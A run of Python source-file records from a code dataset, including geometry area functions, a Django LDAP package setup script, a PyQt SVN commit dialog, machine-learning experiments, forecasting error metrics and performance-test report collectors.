area: float number\n\n Notes\n -----\n No particular bug known\n \n \"\"\"\n side = float(side)\n area = side**2\n return area\n\ndef triangle(base, height):\n \"\"\"\n triangle(base, height) -> float number for area\n\n Return a float number for the area of the triangle with specified base\n and height.\n\n Parameters\n ----------\n base: float or integer number\n height: float or integer number\n\n Returns\n -------\n area: float number\n\n Notes\n -----\n No particular bug known\n \n \"\"\"\n base = float(base)\n height = float(height)\n area = 0.5*base*height\n return area\n \ndef parallelograms(base, height):\n \"\"\"\n parallelograms(base, height) -> float number for area\n\n Return a float number for the area of the parallelograms with specified base\n and height.\n\n Parameters\n ----------\n base: float or integer number\n height: float or integer number\n\n Returns\n -------\n area: float number\n\n Notes\n -----\n No particular bug known\n \n \"\"\"\n base, height = float(base), float(height)\n area = base*height\n return area\n \ndef rhomboedre(smallDiag, bigDiag):\n \"\"\"\n rhomboedre(smallDiag, bigDiag) -> float number for area\n\n Return a float number for the area of the rhomboedre with specified diagonals.\n\n Parameters\n ----------\n smallDiag: float or integer number\n bigDiag: float or integer number\n\n Returns\n -------\n area: float number\n\n Notes\n -----\n No particular bug known\n \n \"\"\"\n smallDiag, bigDiag = float(smallDiag), float(bigDiag)\n area = 0.5*bigDiag*smallDiag\n return area\n\ndef trapeze(base1, base2, height):\n \"\"\"\n trapeze(base, height) -> float number for area\n\n Return a float number for the area of the trapeze with specified bases\n and height.\n\n Parameters\n ----------\n base1: float or integer number\n base2: float or integer number\n height: float or integer number\n\n Returns\n -------\n area: float number\n\n Notes\n -----\n No particular bug known\n \n \"\"\"\n base1, base2 = float(base1), float(base2)\n height = float(height)\n area = 0.5*height*(base1+base2)\n return area\n \ndef circle(radius):\n \"\"\"\n circle(radius) -> float number for area\n\n Return a float number for the area of the circle with specified radius.\n\n Parameters\n ----------\n radius: float or integer number\n\n Returns\n -------\n area: float number\n\n Notes\n -----\n No particular bug known\n \n \"\"\"\n radius = float(radius)\n area = pi*radius**2\n return area\n \ndef circleSector(radius, degrees):\n \"\"\"\n circleSector(radius, degrees) -> float number for area\n\n Return a float number for the area of the circle sector with specified radius\n and angle.\n\n Parameters\n ----------\n radius: float or integer number\n degrees: angle of the sector in degrees, float or integer\n\n Returns\n -------\n area: float number\n\n Notes\n -----\n No particular bug known\n \n \"\"\"\n radius, degrees = float(radius), float(degrees)\n area = (degrees/360)*(circle(radius))\n return area\n\n#EOF\n","sub_path":"hierophis/maths/geometry/area.py","file_name":"area.py","file_ext":"py","file_size_in_byte":6130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"516455164","text":"from distutils.core import setup\nimport os\n\n\ndef split_relative_path(path):\n \"\"\"\n Given a path, return the path as a string with the\n first path component removed (e.g. 'foo/bar/baz' would\n be returned as 'bar/baz').\n \"\"\"\n parts = []\n while True:\n head, tail = os.path.split(path)\n if head == path:\n if path:\n parts.append(path)\n break\n parts.append(tail)\n path = head\n parts.reverse()\n if len(parts) > 1:\n return os.path.join(*parts[1:])\n else:\n return ''\n\ndef get_readme(filename):\n \"\"\"\n Utility function to print the README file, used for the long_description\n setup argument below.\n \"\"\"\n return open(os.path.join(os.path.dirname(__file__), filename)).read()\n\npackages, package_data = [], []\nroot_dir = os.path.dirname(__file__)\nif root_dir:\n os.chdir(root_dir)\n\n# Collect the lists of packages and package files, starting\n# from the base project directory (adapted from the Django setup script)\nfor dirpath, dirnames, filenames in os.walk('ldap_sync'):\n # Collect packages\n if '__init__.py' in filenames:\n pkg_path = os.path.normpath(dirpath)\n pkg = pkg_path.replace(os.sep, '.')\n if os.altsep:\n pkg = pkg.replace(os.altsep, '.')\n packages.append(pkg)\n # Collect ancillary package files\n elif filenames:\n relative_path = split_relative_path(dirpath)\n for f in filenames:\n package_data.append(os.path.join(relative_path, f))\n\nsetup(\n name = 'django-ldap-sync',\n version = '0.1',\n description = 'A Django application for synchronizing LDAP users and groups',\n long_description = get_readme('README'),\n author = 'Jason Bittel',\n author_email = 'jason.bittel@gmail.com',\n url = 'http://github.com/jbittel/django-ldap-sync',\n download_url = 'https://github.com/jbittel/django-ldap-sync/tarball/master',\n package_dir = { 'ldap-sync': 'ldap-sync' },\n packages = packages,\n package_data = { 'ldap-sync': package_data },\n license = 'BSD',\n classifiers = [\n 'Development Status :: 2 - Pre-Alpha',\n 'Environment :: Web Environment',\n 'Programming Language :: Python',\n 'Framework :: Django',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: OS Independent',\n 'Topic :: System :: Systems Administration :: Authentication/Directory',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n ],\n keywords = ['django', 'ldap', 'active directory', 'synchronize', 'sync'],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"147900382","text":"# -*- coding: utf-8 -*-\n\n# Copyright (c) 2003 - 2019 Detlev Offenbach \n#\n\n\"\"\"\nModule implementing a dialog to enter the commit message.\n\"\"\"\n\n\nimport pysvn\n\nfrom PyQt5.QtCore import pyqtSignal, Qt, pyqtSlot\nfrom PyQt5.QtWidgets import QWidget, QDialogButtonBox\n\nfrom .Ui_SvnCommitDialog import Ui_SvnCommitDialog\n\nimport Preferences\n\n\nclass SvnCommitDialog(QWidget, Ui_SvnCommitDialog):\n \"\"\"\n Class implementing a dialog to enter the commit message.\n \n @signal accepted() emitted, if the dialog was accepted\n @signal rejected() emitted, if the dialog was rejected\n \"\"\"\n accepted = pyqtSignal()\n rejected = pyqtSignal()\n \n def __init__(self, changelists, parent=None):\n \"\"\"\n Constructor\n \n @param changelists list of available change lists (list of strings)\n @param parent parent widget (QWidget)\n \"\"\"\n super(SvnCommitDialog, self).__init__(\n parent, Qt.WindowFlags(Qt.Window))\n self.setupUi(self)\n \n if pysvn.svn_version < (1, 5, 0) or pysvn.version < (1, 6, 0):\n self.changeListsGroup.hide()\n else:\n self.changeLists.addItems(sorted(changelists))\n \n def showEvent(self, evt):\n \"\"\"\n Protected method called when the dialog is about to be shown.\n \n @param evt the event (QShowEvent)\n \"\"\"\n self.recentCommitMessages = Preferences.toList(\n Preferences.Prefs.settings.value('Subversion/Commits'))\n self.recentComboBox.clear()\n self.recentComboBox.addItem(\"\")\n self.recentComboBox.addItems(self.recentCommitMessages)\n \n self.logEdit.setFocus(Qt.OtherFocusReason)\n \n def logMessage(self):\n \"\"\"\n Public method to retrieve the log message.\n \n This method has the side effect of saving the 20 most recent\n commit messages for reuse.\n \n @return the log message (string)\n \"\"\"\n msg = self.logEdit.toPlainText()\n if msg:\n if msg in self.recentCommitMessages:\n self.recentCommitMessages.remove(msg)\n self.recentCommitMessages.insert(0, msg)\n no = int(Preferences.Prefs.settings.value(\n 'Subversion/CommitMessages', 20))\n del self.recentCommitMessages[no:]\n Preferences.Prefs.settings.setValue(\n 'Subversion/Commits', self.recentCommitMessages)\n return msg\n \n def hasChangelists(self):\n \"\"\"\n Public method to check, if the user entered some changelists.\n \n @return flag indicating availability of changelists (boolean)\n \"\"\"\n return len(self.changeLists.selectedItems()) > 0\n \n def changelistsData(self):\n \"\"\"\n Public method to retrieve the changelists data.\n \n @return tuple containing the changelists (list of strings) and a flag\n indicating to keep changelists (boolean)\n \"\"\"\n slists = [l.text().strip() for l in self.changeLists.selectedItems()\n if l.text().strip() != \"\"]\n \n if len(slists) == 0:\n return [], False\n \n return slists, self.keepChangeListsCheckBox.isChecked()\n \n def on_buttonBox_clicked(self, button):\n \"\"\"\n Private slot called by a button of the button box clicked.\n \n @param button button that was clicked (QAbstractButton)\n \"\"\"\n if button == self.buttonBox.button(QDialogButtonBox.Cancel):\n self.logEdit.clear()\n \n def on_buttonBox_accepted(self):\n \"\"\"\n Private slot called by the buttonBox accepted signal.\n \"\"\"\n self.close()\n self.accepted.emit()\n \n def on_buttonBox_rejected(self):\n \"\"\"\n Private slot called by the buttonBox rejected signal.\n \"\"\"\n self.close()\n self.rejected.emit()\n \n @pyqtSlot(str)\n def on_recentComboBox_activated(self, txt):\n \"\"\"\n Private slot to select a commit message from recent ones.\n \n @param txt selected recent commit message (string)\n \"\"\"\n if txt:\n self.logEdit.setPlainText(txt)\n","sub_path":"PYTHON/Python_GUI/eric6-19.11/eric/eric6/Plugins/VcsPlugins/vcsPySvn/SvnCommitDialog.py","file_name":"SvnCommitDialog.py","file_ext":"py","file_size_in_byte":4255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"378874064","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport time\n\nimport tensorflow as tf\nfrom keras.datasets import fashion_mnist\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout\nfrom keras.activations import softmax\nfrom keras.optimizers import adam\nfrom keras.losses import sparse_categorical_crossentropy\n\n# from sklearn import\n\n\ndef NN_with(x_train, y_train, nouron_number_layer1, nouron_number_layer2, batch_size, epoch):\n my_model = Sequential()\n my_model.add(Dense(nouron_number_layer1, activation='relu', input_shape=(784,)))\n my_model.add(Dense(nouron_number_layer2, activation='relu'))\n my_model.add(Dropout(0.3))\n my_model.add(Dense(10, activation=softmax))\n my_model.compile(optimizer='sgd', loss=sparse_categorical_crossentropy, metrics=['accuracy'])\n trained_model = my_model.fit(x_train, y_train, batch_size=batch_size, epochs=epoch, validation_split=0.2)\n return trained_model, my_model\n\n\ndef my_nn(nouron_number_layer1, nouron_number_layer2, batch_size, epoch):\n print(\"\\n\\n\\n Network With layer1 of: \", nouron_number_layer1, \"Nourons and layer2 of: \", nouron_number_layer2, \"and Batch_size: \", batch_size, \"And Epoch: \", epoch)\n (x_train, y_train), (x_test, y_test) = fashion_mnist.load_data()\n\n x_train = x_train / 255.0\n x_test = x_test / 255.0\n\n class_names = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat', 'Sandal', 'Shirt', 'Sneaker', 'Bag',\n 'Ankle boot']\n\n x_train = np.array(x_train).reshape(60000, 28 * 28)\n x_test = np.array(x_test).reshape(10000, 28 * 28)\n\n start_time = time.time()\n trained_model, my_model = NN_with(x_train, y_train, nouron_number_layer1, nouron_number_layer2, batch_size, epoch)\n print(\"Trained finished in: \", time.time() - start_time)\n history = trained_model.history\n test_loss, test_acc = my_model.evaluate(x_test, y_test, verbose=2)\n print('\\nTest accuracy:', test_acc)\n print('\\nTest loss:', test_loss)\n\n plt.title('NN with layer1 of: ' + str(nouron_number_layer1) + ' layer2 of: ' + str(nouron_number_layer2) + ' batch_size of: ' + str(batch_size))\n plt.xlabel('Epochs')\n plt.ylabel('Loss')\n plt.plot(history['loss'])\n plt.plot(history['val_loss'])\n plt.legend(['loss', 'val_loss'])\n\n plt.figure()\n plt.title('NN with layer1 of: ' + str(nouron_number_layer1) + ' layer2 of: ' + str(nouron_number_layer2) + ' batch_size of: ' + str(batch_size))\n plt.xlabel('Epochs')\n plt.ylabel('accuracy')\n plt.plot(history['accuracy'])\n plt.plot(history['val_accuracy'])\n plt.legend(['acc', 'val_acc'])\n\n plt.show()\n\n from sklearn.metrics import confusion_matrix\n test_prediction = my_model.predict_classes(x_test)\n matrix = confusion_matrix(y_true=y_test, y_pred=test_prediction)\n print(\"Matrix= \")\n\n print(matrix)\n\n marks = np.arange(len(class_names))\n cmap = plt.cm.Blues\n # title = 'Confusion matrix'\n plt.figure()\n plt.imshow(matrix, interpolation='nearest', cmap=cmap)\n plt.title('NN with layer1 of: ' + str(nouron_number_layer1) + ' layer2 of: ' + str(nouron_number_layer2) + ' batch_size of: ' + str(batch_size) + ' For Confusion matrix')\n plt.colorbar()\n plt.xticks(marks, class_names, rotation=45)\n plt.yticks(marks, class_names)\n plt.tight_layout()\n plt.show()\n\n\nmy_nn(70, 10, 32, 30)\nmy_nn(128, 30, 32, 30)\nmy_nn(784, 128, 32, 30)\n#\n#\nmy_nn(128, 50, 32, 30)\nmy_nn(128, 50, 64, 30)\nmy_nn(128, 50, 256, 30)\n","sub_path":"MLP_Madaline_DimensionalityReduction/Fashion-MNIST_Classification.py","file_name":"Fashion-MNIST_Classification.py","file_ext":"py","file_size_in_byte":3467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"617156940","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 1 12:12:17 2018\n\n@author: nicholas.marini\n\"\"\"\n\nheight = int(input(\"How high do you want your pyramid? \"))\n\nblock = \"*\"\n\nwhile height >0:\n print(block*height)\n height -= 1\nelse:\n print(\"the end\")","sub_path":"Python/Week1/pyramid.py","file_name":"pyramid.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"642588162","text":"'''\nRuns for CodeMIx Sentiment Analysis task2\nauthors: Nitin Nikamanth Appiah Balaji, Bharahti B\n'''\nfrom sklearn.metrics import f1_score, accuracy_score\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.naive_bayes import BernoulliNB\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import precision_score, recall_score, f1_score\nimport pandas as pd\nimport numpy as np\nfrom sentence_transformers import SentenceTransformer\nfrom tqdm import tqdm\n\n'''\nLoading data-sets\n'''\ntrain = pd.read_csv('../codemix-corpus-fire2020/malayalam_train.tsv','\\t')\ndev = pd.read_csv('../codemix-corpus-fire2020/malayalam_dev.tsv','\\t')\ntest = pd.read_csv('../Dravidian-CodeMix/malayalam_test.csv')\n\nX_train_ori, y_train = train['text'], train['category']\nX_dev_ori, y_dev = dev['text'], dev['category']\nX_test_ori, y_test = test['text'], dev['category']\n\n'''\nGenerating char count vectorization and converting sentences to vectors\nchar count ngram range=1-5\n'''\nvectorizer = CountVectorizer(analyzer='char', ngram_range=(1,5), max_features=50000)\nX_train = vectorizer.fit_transform(X_train_ori)\nX_dev = vectorizer.transform(X_dev_ori)\nX_test = vectorizer.transform(X_test_ori)\n\nclf = BernoulliNB()\nclf.fit(X_train, y_train)\npred = clf.predict(X_dev)\nprint(\"Count vec + NB:\")\n# print(\"f1 score:\",f1_score(y_dev, pred, average='weighted'))\n# print(\"acc:\",accuracy_score(y_dev, pred))\nprint(classification_report(y_dev, pred))\n\nclf = MLPClassifier(hidden_layer_sizes=(512),max_iter=300)\nclf.fit(X_train, y_train)\npred = clf.predict(X_dev)\nprint(\"Count vec + LR\")\n# print(\"f1 score:\",f1_score(y_dev, pred, average='weighted'))\n# print(\"acc:\",accuracy_score(y_dev, pred))\nprint(classification_report(y_dev, pred))\n\n'''\nGenerating char TFIDF vectorization and converting sentences to vectors\nchar TFIDF ngram range=1-5\n'''\nvectorizer = TfidfVectorizer(analyzer='char', ngram_range=(1,5), max_features=50000)\nX_train = vectorizer.fit_transform(X_train_ori)\nX_dev = vectorizer.transform(X_dev_ori)\nX_test = vectorizer.transform(X_test_ori)\n\nclf = BernoulliNB()\nclf.fit(X_train, y_train)\npred = clf.predict(X_dev)\nprint(\"TFIDF + NB:\")\n# print(\"f1 score:\",f1_score(y_dev, pred, average='weighted'))\n# print(\"acc:\",accuracy_score(y_dev, pred))\nprint(classification_report(y_dev, pred))\n\nclf = MLPClassifier(hidden_layer_sizes=(512), max_iter=300)\nclf.fit(X_train, y_train)\npred = clf.predict(X_dev)\nprint(\"TFIDF + LR:\")\n# print(\"f1 score:\",f1_score(y_dev, pred, average='weighted'))\n# print(\"acc:\",accuracy_score(y_dev, pred))\nprint(classification_report(y_dev, pred))\n\n'''\nmultilingual BERT model loading and embedding generation\n'''\ntest = pd.read_csv('../Dravidian-CodeMix/malayalam_test.csv')\nmodel = SentenceTransformer('distiluse-base-multilingual-cased',device='cuda:1')\nX_train = model.encode(X_train_ori, batch_size=20,show_progress_bar=True)\nX_dev = model.encode(X_dev_ori, batch_size=20, show_progress_bar=True)\nX_test = model.encode(X_test_ori, batch_size=20, show_progress_bar=True)\n\nclf = MLPClassifier(hidden_layer_sizes=(512,),max_iter=25)\nclf.fit(X_train, y_train)\npred = clf.predict(X_dev)\nprint(\"BERT + MLP:\")\n# print(\"f1 score:\",f1_score(y_dev, pred, average='weighted'))\n# print(\"acc:\",accuracy_score(y_dev, pred))\nprint(classification_report(y_dev, pred))\n\n'''\nLoading Malayalam specific pretrained fastText model\n'''\nfrom pymagnitude import *\nfrom nltk import word_tokenize\nfast = Magnitude(\"../downloads/malayalam.magnitude\")\ndef fasttext(x):\n vectors = []\n for title in tqdm(x):\n vectors.append(np.average(fast.query(word_tokenize(title)), axis = 0))\n return np.array(vectors)\nX_train = fasttext(train['text'])\nX_dev = fasttext(dev['text'])\n\nclf = MLPClassifier(hidden_layer_sizes=(1024,),max_iter=25)\nclf.fit(X_train, y_train)\npred = clf.predict(X_dev)\nprint(\"FASTTEXT + MLP:\")\n# print(\"f1 score:\",f1_score(y_dev, pred,average='weighted'))\n# print(\"acc:\",accuracy_score(y_dev, pred))\nprint(classification_report(y_dev, pred))\n","sub_path":"CodeMix-Sentiment_Analysis/Task2-vectorization.py","file_name":"Task2-vectorization.py","file_ext":"py","file_size_in_byte":4155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"561221679","text":"# -*- coding: utf-8 -*-\n\"\"\"Metrics module for error functions.\"\"\"\n\nfrom functools import wraps\n\nimport numpy as np\n\n\ndef mae(data, data_truth):\n \"\"\"Computes mean absolute error (MAE)\n\n :param data: Predicted time series values (n_timesteps, n_timeseries)\n :type data: numpy array\n :param data_truth: Ground truth time series values\n :type data_truth: numpy array\n\n \"\"\"\n\n return np.mean(np.abs(data - data_truth))\n\n\ndef mape(data, data_truth):\n \"\"\"Computes mean absolute percentage error (MAPE)\n\n :param data: Predicted time series values (n_timesteps, n_timeseries)\n :type data: numpy array\n :param data_truth: Ground truth time series values\n :type data_truth: numpy array\n\n \"\"\"\n\n eps = 1e-16 # Need to make sure that denominator is not zero\n normalization = np.abs(data_truth) + eps\n\n return np.mean(np.abs(data - data_truth) / normalization) * 100.0\n\n\ndef mse(data, data_truth):\n \"\"\"Computes mean squared error (MSE)\n\n :param data: Predicted time series values (n_timesteps, n_timeseries)\n :type data: numpy array\n :param data_truth: Ground truth time series values\n :type data_truth: numpy array\n\n \"\"\"\n\n return np.mean(np.square((data - data_truth)))\n\n\ndef rmse(data, data_truth):\n \"\"\"Computes root-mean squared error (RMSE)\n\n :param data: Predicted time series values (n_timesteps, n_timeseries)\n :type data: numpy array\n :param data_truth: Ground truth time series values\n :type data_truth: numpy array\n\n \"\"\"\n\n return np.sqrt(mse(data, data_truth))\n\n\ndef smape(data, data_truth):\n \"\"\"Computes symmetric mean absolute percentage error (SMAPE)\n\n :param data: Predicted time series values (n_timesteps, n_timeseries)\n :type data: numpy array\n :param data_truth: Ground truth time series values\n :type data_truth: numpy array\n\n \"\"\"\n\n eps = 1e-16 # Need to make sure that denominator is not zero\n normalization = 0.5 * (np.abs(data) + np.abs(data_truth)) + eps\n\n return np.mean(np.abs(data - data_truth) / normalization) * 100.0\n\n\ndef mase(data, data_truth, insample, freq):\n \"\"\"Calculates Mean Absolute Scaled Error (MASE)\n\n :param data: Predicted time series values (n_timesteps, n_timeseries)\n :type data: numpy array\n :param data_truth: Ground truth time series values\n :type data_truth: numpy array\n :param insample: time series in training set (n_timesteps, n_timeseries)\n :type insample: numpy array\n :param freq: frequency or seasonality in the data (i.e. 12 for monthly series)\n :type freq: integer\n\n \"\"\"\n\n eps = 1e-16 # Need to make sure that denominator is not zero\n normalization = np.mean(np.abs(insample[freq:] - insample[:-freq])) + eps\n\n return np.mean(np.abs(data - data_truth)) / normalization * 100.0\n\n\ndef msis(data_upper, data_lower, data_truth, insample, freq, alpha=0.05):\n \"\"\"Computes Mean Scaled Interval Score (MSIS)\n\n :param data_upper: Predicted upper bound of time series values \n :type data_upper: numpy array\n :param data_lower: Predicted lower bound of time series values\n :type data_lower: numpy array\n :param data_truth: Ground truth time series values\n :type data_truth: numpy array\n :param insample: time series in training set (n_timesteps, n_timeseries)\n :type insample: numpy array\n :param freq: frequency or seasonality in the data (i.e. 12 for monthly series)\n :type freq: integer\n :param alpha: significance level (i.e. 95% confidence interval means alpha = 0.05) \n :type alpha: float\n\n \"\"\"\n\n eps = 1e-16 # Need to make sure that denominator is not zero\n normalization = np.mean(np.abs(insample[freq:] - insample[:-freq])) + eps\n mean_interval_score = np.mean((data_upper - data_lower)\n + 2.0 / alpha *\n (data_lower - data_truth) *\n (data_truth < data_lower)\n + 2.0 / alpha *\n (data_truth - data_upper) *\n (data_truth > data_upper)\n )\n\n return mean_interval_score / normalization * 100.0\n\n\ndef coverage(data_upper, data_lower, data_truth):\n \"\"\"Computes coverage rate of the prediction interval.\n\n :param data_upper: Predicted upper bound of time series values \n :type data_upper: numpy array\n :param data_lower: Predicted lower bound of time series values\n :type data_lower: numpy array\n :param data_truth: Ground truth time series values\n :type data_truth: numpy array\n\n \"\"\"\n\n coverage_percentage = np.mean(\n 1.0 * (data_truth > data_lower) * (data_truth < data_upper))\n\n return coverage_percentage * 100.0\n\n\ndef print_model_performance_mean_accuracy(data, data_truth,\n metric_list=['mape', 'smape'],\n freq=12, ts_train=None):\n \"\"\"Print out model performance on prediction accuracy\n\n :param data: Predicted time series values (n_timesteps, n_timeseries)\n :type data: numpy array\n :param data_truth: Ground truth time series values\n :type data_truth: numpy array\n :param metric_list: names of metrics to measure accuracy, e.g. mape, smape, mase\n :type metric_list: string or list, e.g. 'mape' or ['mape','smape','mase']\n :param freq: frequency or seasonality in the data (i.e. 12 for monthly series)\n :type freq: integer\n :param ts_train: time series in training set (n_timesteps, n_timeseries)\n :type ts_train: numpy array\n\n \"\"\"\n\n # check if metric_list is a list; if not, convert to a list.\n if (not isinstance(metric_list, list)):\n metric_list = [metric_list]\n\n metric_value = []\n for i in metric_list:\n if (i == 'mape'):\n name = 'Mean Absolute Percentage Error'\n val = mape(data, data_truth)\n print('\\t {0}: {1:.1f}%'.format(name, val))\n metric_value.append(val)\n elif(i == 'smape'):\n name = 'Symmetric Mean Absolute Percentage Error'\n val = smape(data, data_truth)\n print('\\t {0}: {1:.1f}%'.format(name, val))\n metric_value.append(val)\n elif (i == 'mase'):\n name = 'Mean Absolute Scaled Error'\n val = mase(data, data_truth, ts_train, freq)\n print('\\t {0}: {1:.1f}%'.format(name, val))\n metric_value.append(val)\n\n return metric_value\n\n\ndef print_model_performance_uncertainty(pred_samples, data_truth,\n metric_list='coverage', freq=12,\n confidence_level=0.95,\n ts_train=None, verbose=True):\n \"\"\"Print out model performance on uncertainty\n\n :param pred_samples: Prediction samples of time series (n_timesteps, n_timeseries)\n :type pred_samples: numpy array\n :param data_truth: Ground truth time series values (n_timesteps, n_timeseries)\n :type data_truth: numpy array\n :param metric_list: names of metrics to measure uncertainty, e.g. 'msis', 'coverage'\n :type metric_list: string or list, e.g. 'coverage' or ['msis','coverage']\n :param freq: frequency or seasonality in the data (i.e. 12 for monthly series)\n :type freq: integer\n :param confidence_level: specified confidence level for the predictive interval, e.g. 0.95\n :type confidence_level: float or list, values between 0 and 1, e.g. [0.9, 0.95]\n :param ts_train: time series in training set (n_timesteps, n_timeseries)\n :type ts_train: numpy array\n :param verbose: print out the metric values\n :type verbose: boolean\n\n \"\"\"\n\n if (not isinstance(metric_list, list)):\n metric_list = [metric_list]\n\n if (not isinstance(confidence_level, list)):\n confidence_level = [confidence_level]\n\n metric_value_all_confidence_level = []\n\n for p in confidence_level:\n alpha = 1.0 - p\n quantiles = [alpha / 2 * 100, (1 - alpha / 2) * 100]\n\n pred_upper = np.nanpercentile(pred_samples, quantiles[1], axis=0)\n pred_lower = np.nanpercentile(pred_samples, quantiles[0], axis=0)\n\n metric_value = []\n for i in metric_list:\n if (i == 'msis'):\n name = 'Mean Scaled Interval Score'\n val = msis(pred_upper, pred_lower,\n data_truth, ts_train, freq, alpha)\n metric_value.append(val)\n if verbose:\n print('\\t {0} at {1}% confidence level: {2:.1f}%'.format(\n name, int(p*100), val))\n elif (i == 'coverage'):\n name = 'Coverage Percentage'\n val = coverage(pred_upper, pred_lower, data_truth)\n metric_value.append(val)\n if verbose:\n print('\\t {0} at {1}% confidence level: {2:.1f}%'.format(\n name, int(p*100), val))\n\n metric_value_all_confidence_level.append(metric_value)\n\n return metric_value_all_confidence_level\n","sub_path":"deep4cast/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":9054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"282295022","text":"N = int(input())\nA = []\nmemo = []\ncandidate = {}\n\ndef set_A():\n global A\n \n import sys\n A.append(-1)\n A += list(map(int, sys.stdin.readline().split()))\n\ndef set_memo():\n memo.append(-1)\n memo.append(1)\n\ndef set_candidate():\n candidate[-1] = 0\n candidate[A[1]] = 1\n\ndef update_memo_candidate(ind, target):\n memo.append(target)\n candidate[A[ind]] = target\n\ndef get_cand(num):\n keys = candidate.keys()\n keys = sorted(keys, reverse=True)\n \n result = 0\n for i in keys:\n if(num > i):\n result = max(candidate[i], result)\n\n return result\n\ndef record():\n for ind in range(2, N+1):\n target = get_cand(A[ind])\n\n if(A[ind - 1] < A[ind]):\n target = max(memo[ind - 1], target)\n\n target += 1\n\n update_memo_candidate(ind, target)\n\ndef is_extra():\n if(N == 1):\n print(memo[1])\n return True\n return False\n\ndef print_result():\n # print(candidate)\n print(max(memo))\n\ndef main():\n if(not is_extra()):\n record()\n print_result()\n\nif(__name__ == \"__main__\"):\n set_A()\n set_memo()\n set_candidate()\n main()","sub_path":"by date/2021.01.29/11053.py","file_name":"11053.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"646783083","text":"\"\"\"Performancetest-runner collector.\"\"\"\n\nfrom abc import ABC\nfrom datetime import datetime\nfrom typing import List\n\nfrom bs4 import BeautifulSoup, Tag\n\nfrom collector_utilities.type import Entities, Entity, Response, Responses, Value\nfrom .source_collector import FileSourceCollector, SourceUpToDatenessCollector\n\n\nclass PerformanceTestRunnerBaseClass(FileSourceCollector, ABC): # pylint: disable=abstract-method\n \"\"\"Base class for performancetest runner collectors.\"\"\"\n\n file_extensions = [\"html\"]\n\n @staticmethod\n def _soup(response: Response):\n \"\"\"Return the HTML soup.\"\"\"\n return BeautifulSoup(response.text, \"html.parser\")\n\n\nclass PerformanceTestRunnerSlowTransactions(PerformanceTestRunnerBaseClass):\n \"\"\"Collector for the number of slow transactions in a Performancetest-runner performancetest report.\"\"\"\n\n def _parse_source_responses_value(self, responses: Responses) -> Value:\n return str(len(self.__slow_transactions(responses)))\n\n def _parse_source_responses_entities(self, responses: Responses) -> Entities:\n\n def entity(transaction) -> Entity:\n \"\"\"Transform a transaction into a transaction entity.\"\"\"\n name = transaction.find(\"td\", class_=\"name\").string\n threshold = \"high\" if transaction.select(\"td.red.evaluated\") else \"warning\"\n return dict(key=name, name=name, threshold=threshold)\n\n return [entity(transaction) for transaction in self.__slow_transactions(responses)]\n\n def __slow_transactions(self, responses: Responses) -> List[Tag]:\n \"\"\"Return the slow transactions in the performancetest report.\"\"\"\n thresholds = self._parameter(\"thresholds\")\n slow_transactions: List[Tag] = []\n for response in responses:\n soup = self._soup(response)\n for color in thresholds:\n slow_transactions.extend(soup.select(f\"tr.transaction:has(> td.{color}.evaluated)\"))\n return slow_transactions\n\n\nclass PerformanceTestRunnerSourceUpToDateness(PerformanceTestRunnerBaseClass, SourceUpToDatenessCollector):\n \"\"\"Collector for the performancetest report age.\"\"\"\n\n def _parse_source_response_date_time(self, response: Response) -> datetime:\n datetime_parts = [int(part) for part in self._soup(response).find(id=\"start_of_the_test\").string.split(\".\")]\n return datetime(*datetime_parts) # type: ignore\n\n\nclass PerformanceTestRunnerPerformanceTestDuration(PerformanceTestRunnerBaseClass):\n \"\"\"Collector for the performancetest duration.\"\"\"\n\n def _parse_source_responses_value(self, responses: Responses) -> Value:\n durations = []\n for response in responses:\n hours, minutes, seconds = [\n int(part) for part in self._soup(response).find(id=\"duration\").string.split(\":\", 2)]\n durations.append(60 * hours + minutes + round(seconds / 60.))\n return str(sum(durations))\n\n\nclass PerformanceTestRunnerPerformanceTestStability(PerformanceTestRunnerBaseClass):\n \"\"\"Collector for the performancetest stability.\"\"\"\n\n def _parse_source_responses_value(self, responses: Responses) -> Value:\n trend_breaks = []\n for response in responses:\n trend_breaks.append(int(self._soup(response).find(id=\"trendbreak_stability\").string))\n return str(min(trend_breaks))\n\n\nclass PerformanceTestRunnerTests(PerformanceTestRunnerBaseClass):\n \"\"\"Collector for the number of performance test transactions.\"\"\"\n\n status_parameter = \"test_result\"\n\n def _parse_source_responses_value(self, responses: Responses) -> Value:\n count = 0\n statuses = self._parameter(self.status_parameter)\n for response in responses:\n count += sum(int(self._soup(response).find(id=status).string) for status in statuses)\n return str(count)\n\n\nclass PerformanceTestRunnerFailedTests(PerformanceTestRunnerTests):\n \"\"\"Collector for the number of failed performance test transactions.\"\"\"\n\n status_parameter = \"failure_type\"\n\n\nclass PerformanceTestRunnerScalability(PerformanceTestRunnerBaseClass):\n \"\"\"Collector for the scalability metric.\"\"\"\n\n def _parse_source_responses_value(self, responses: Responses) -> Value:\n trend_breaks = []\n for response in responses:\n breaking_point = int(self._soup(response).find(id=\"trendbreak_scalability\").string)\n if breaking_point == 100:\n raise AssertionError(\n \"No performance scalability breaking point occurred (breaking point is at 100%, expected < 100%)\")\n 